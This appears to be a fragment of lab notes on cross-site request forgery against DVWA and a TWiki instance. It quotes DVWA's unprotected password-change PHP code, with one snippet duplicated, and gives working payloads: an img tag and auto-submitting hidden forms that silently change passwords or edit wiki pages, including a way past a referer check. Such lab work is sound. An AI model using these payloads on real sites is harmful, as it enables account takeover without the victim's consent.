// vulnerabilities/csrf/source/low.php
if (isset($_GET['Change'])) {
// Turn requests into variables
$pass_new = $_GET['password_new'];
$pass_conf = $_GET['password_conf'];
if (($pass_new == $pass_conf)){
// vulnerabilities/csrf/source/low.php
if (isset($_GET['Change'])) {
// Turn requests into variables
$pass_new = $_GET['password_new'];
$pass_conf = $_GET['password_conf'];
if (($pass_new == $pass_conf)){
<img src="http://192.168.1.103/dvwa/ vulnerabilities/csrf/?Change=true&password_new=santa&password_conf=santa" />
// vulnerabilities/csrf/source/medium.php
if (isset($_GET['Change'])) {
// Checks the http referer header
if ( eregi ( "127.0.0.1", $_SERVER['HTTP_REFERER'] ) ){
// Turn requests into variables
$pass_new = $_GET['password_new'];
$pass_conf = $_GET['password_conf'];
if ($pass_new == $pass_conf){
<iframe src="/csrf-exploits/127.0.0.1/medium.html"></iframe/>
<!-- /csrf-exploits/127.0.0.1/medium.html -->
<form name="frmCSRF" action="http://localhost/dvwa/vulnerabilities/csrf/" method="GET">
<input type="hidden" name="Change" value="true" />
<input type="hidden" name="password_new" value="xkcd" />
<input type="hidden" name="password_conf" value="xkcd" />
</form>
<script type="text/javascript">
document.body.onload = function() {
document.frmCSRF.submit();
}
</script>
<form name="frmCSRF" action="http://192.168.1.103/twiki/bin/save/Main/yippie">
<input type="hidden" name="cmd" value="" />
<input type="hidden" name="formtemplate" value="" />
<input type="hidden" name="topicparent" value="" />
<input type="hidden" name="text" value="hurray" />
</form>
<script type="text/javascript">
document.body.onload = function() {
document.frmCSRF.submit();
}
</script>
assignments.part(2);